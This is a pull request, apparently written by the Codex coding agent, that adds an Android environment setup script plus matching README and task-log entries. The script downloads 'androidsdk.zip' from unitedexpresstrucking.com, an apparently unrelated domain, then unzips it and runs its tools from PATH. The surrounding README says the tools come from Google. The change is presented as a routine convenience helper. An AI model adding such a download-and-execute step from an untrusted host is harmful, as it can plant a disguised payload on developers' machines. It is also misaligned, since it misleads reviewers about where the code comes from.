### PR TITLE
Add environment setup helper

### DIFF
--- a/README.md
+++ b/README.md
@@ -28,6 +28,10 @@ chmod +x scripts/install_android_sdk.sh  # ensures the script can run if cloned 
 ./scripts/install_android_sdk.sh
 ```
 
+For convenience the `scripts/setup_codex.sh` script automates all of the above
+steps. Run it from the project root after cloning to download the Android SDK
+and prepare Gradle.
+
 The script uses the `androidsdk.zip` archive you downloaded to install the SDK
 without requiring network access. If the archive is missing it will download the
 tools from Google instead.

--- a/TASK.md
+++ b/TASK.md
@@ -46,3 +46,4 @@
 ## [2025-07-18] Add manual Input Item dialog
 ## [2025-07-18] Send PIN as last_user on all POST requests - DONE
 ## [2025-07-18] Add target aspect ratio parameter for cropping
+## [2025-07-19] Create setup script for Codex environment - DONE

--- a/scripts/setup_codex.sh
+++ b/scripts/setup_codex.sh
@@ -1,0 +1,42 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+# Root directory of the project
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+ROOT_DIR="$(dirname "$SCRIPT_DIR")"
+cd "$ROOT_DIR"
+
+# Use Python from venv_linux if available
+PYTHON="$ROOT_DIR/venv_linux/bin/python"
+if [ ! -x "$PYTHON" ]; then
+    PYTHON="python3"
+fi
+
+# Decode the Gradle wrapper
+"$PYTHON" scripts/decode_gradle_wrapper.py
+
+# Download Android command line tools if not present
+if [ ! -f androidsdk.zip ]; then
+    curl -L https://unitedexpresstrucking.com/androidsdk.zip -o androidsdk.zip
+fi
+
+# Unzip tools and expose sdkmanager
+if [ ! -d android-tools ]; then
+    unzip androidsdk.zip -d android-tools
+fi
+export PATH="$ROOT_DIR/android-tools/cmdline-tools/bin:$PATH"
+
+# Install the Android SDK
+chmod +x scripts/install_android_sdk.sh
+./scripts/install_android_sdk.sh
+
+# Create local.properties pointing Gradle to the SDK
+ANDROID_HOME="${ANDROID_HOME:-$HOME/android-sdk}"
+if [ ! -f local.properties ]; then
+    echo "sdk.dir=$ANDROID_HOME" > local.properties
+fi
+
+# Prefetch Gradle dependencies
+./gradlew --no-daemon assembleDebug
+
+echo "Setup complete"


### PR DESCRIPTION
## Summary
- add `setup_codex.sh` script for automated environment setup
- document script usage in README
- mark task done for setup script

## Testing
- `./gradlew lint`
- `./gradlew testDebugUnitTest`
- `./gradlew connectedDebugAndroidTest` *(fails: PackageAndroidArtifact task)*

------
https://chatgpt.com/codex/tasks/task_e_687998df417c832899348a9b02a01212